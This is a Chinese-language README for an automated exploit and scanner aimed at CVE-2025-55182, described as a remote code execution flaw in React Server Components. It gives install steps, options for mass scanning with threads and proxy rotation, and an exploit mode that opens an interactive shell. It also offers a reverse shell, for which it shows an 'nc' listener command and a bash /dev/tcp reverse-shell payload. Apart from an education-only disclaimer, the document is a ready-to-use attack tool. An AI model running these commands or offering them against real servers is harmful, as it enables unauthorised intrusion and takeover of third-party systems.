
针对 React Server Components(CVE-2025-55182)的严重 RCE 漏洞扫描器。自动化利用框架,支持多载荷、代理功能及交互式命令执行。
[!Warning] 本仓库仅用于教育和研究目的。
- 请仅在您拥有或已获得明确许可的系统上使用所提供的PoC。
- 未经授权的访问、利用或滥用本仓库中的任何材料都是非法的。
- 作者不对因不当使用造成的任何损害、误用或法律后果承担责任。
CVE-2025-55182 是一个严重远程代码执行漏洞,影响 React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0。该漏洞源于对 Server Function 端点的 HTTP 请求负载进行不安全的反序列化,允许未经身份验证的攻击者远程执行任意代码。
CVE 编号:CVE-2025-55182
受影响版本:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| 参数 | 描述 |
|---|---|
-d, --detection | 运行检测模式(扫描漏洞) |
-e, --exploit | 运行利用模式(攻击单个目标) |
-u, --url URL | 要扫描/攻击的单个目标 URL |
-l, --list FILE | 包含目标 URL 列表的文件(仅检测模式) |
-p, --proxy URL | 单个代理 URL(例如 http://127.0.0.1:8080) |
-pl, --proxy-list FILE | 包含代理 URL 列表的文件(每行一个) |
-t, --threads N | 并发线程数(默认:10,仅检测模式) |
-s, --silent | 静默模式 - 仅显示存在漏洞的目标(仅检测模式) |
-o, --output [FILE] | 将存在漏洞的目标保存到文件(仅检测模式)。如果未提供文件名,则使用默认值:CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | 启用调试日志 - 显示响应详情和重试尝试(静默模式不可用) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
然后选择 [i] 进入交互式 Shell:
选择利用方式:
[i] 交互式 Shell
[r] 反弹 Shell
输入你的选择 (i/r):i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
然后选择 [r] 进入反弹 Shell 并选择载荷类型:
选择利用方式:
[i] 交互式 Shell
[r] 反弹 Shell
输入你的选择 (i/r):r
选择载荷选项:
[d] 使用默认载荷(尝试多种反弹 Shell)
[c] 提供自定义载荷
输入你的选择 (d/c):d
按照以下格式输入你的 IP 和端口:
示例:192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
使用以下命令设置你的监听器:
nc -lvnp 4444
当你的监听器就绪后,按回车键...
该工具将自动尝试 17 种以上的反弹 Shell 载荷,直到成功为止。
输入你的选择 (d/c):c
输入你的自定义反弹 Shell 载荷:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1